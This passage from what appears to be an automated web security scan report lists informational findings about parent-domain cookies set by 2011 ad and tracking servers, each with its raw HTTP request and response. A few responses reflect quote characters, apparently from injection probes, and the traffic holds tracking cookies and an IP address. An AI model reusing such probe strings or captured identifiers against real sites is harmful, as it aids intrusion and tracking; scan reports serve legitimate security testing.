Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 12 Sep 2011 12:40:56 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 11-Sep-2013 12:40:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.6. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

10.7. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=594085&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.popsugar.com/community/welcome&t=Welcome&java=1&security=defbf778&sc_random=0.8725620578043163&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831680.0; expires=Sat, 10-Sep-2016 12:48:00 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.8. http://c13.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c13.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=1345764&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.nowpublic.com/&t=NowPublic.com%20%7C%20The%20News%20is%20NowPublic&java=1&security=26324a10&sc_random=0.533788861008361 HTTP/1.1
Host: c13.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315831702.0; expires=Sat, 10-Sep-2016 12:48:22 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.9. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=14&q=&$=&s=2&z=0.5840262724086642 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0; PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1a0a560b687152eaa6ee3ef9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:1545,8,0:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:29:27:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236|1,1#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:53 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=165
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:48:53 GMT
Content-Length: 4602
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1a0a560b687
...[SNIP]...

10.10. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:31 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:31 GMT
Content-Length: 7450
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

10.11. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7040/7039/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1638&z=0.628017297713086 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 507
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7040,15:305,7038,15:305,7038,0:0,7038,15:305,0,15:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:29:1:1:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7040,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=146
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1638;var zzPat='1a0a56
...[SNIP]...

10.12. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 407
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:305,0,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

10.13. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 420
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=85
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:38 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='5406e''
...[SNIP]...

10.14. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.3701211323495954 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=3:3:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2470080B826,110235|0,1#0,24;expires=Wed, 12 Oct 2011 13:03:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:3:3:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 12 Sep 2011 13:06:33 GMT
Date: Mon, 12 Sep 2011 13:03:56 GMT
Content-Length: 4557
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCust
...[SNIP]...

10.15. http://c7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1201513Za1013066Zc305007038%2C305007038Zs608Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6687
Date: Mon, 12 Sep 2011 12:48:33 GMT
Connection: close



10.16. http://cm.npc-morris.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF0dXZ2cAN%2bpN%2bAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:41 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

10.17. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counters.gigya.com
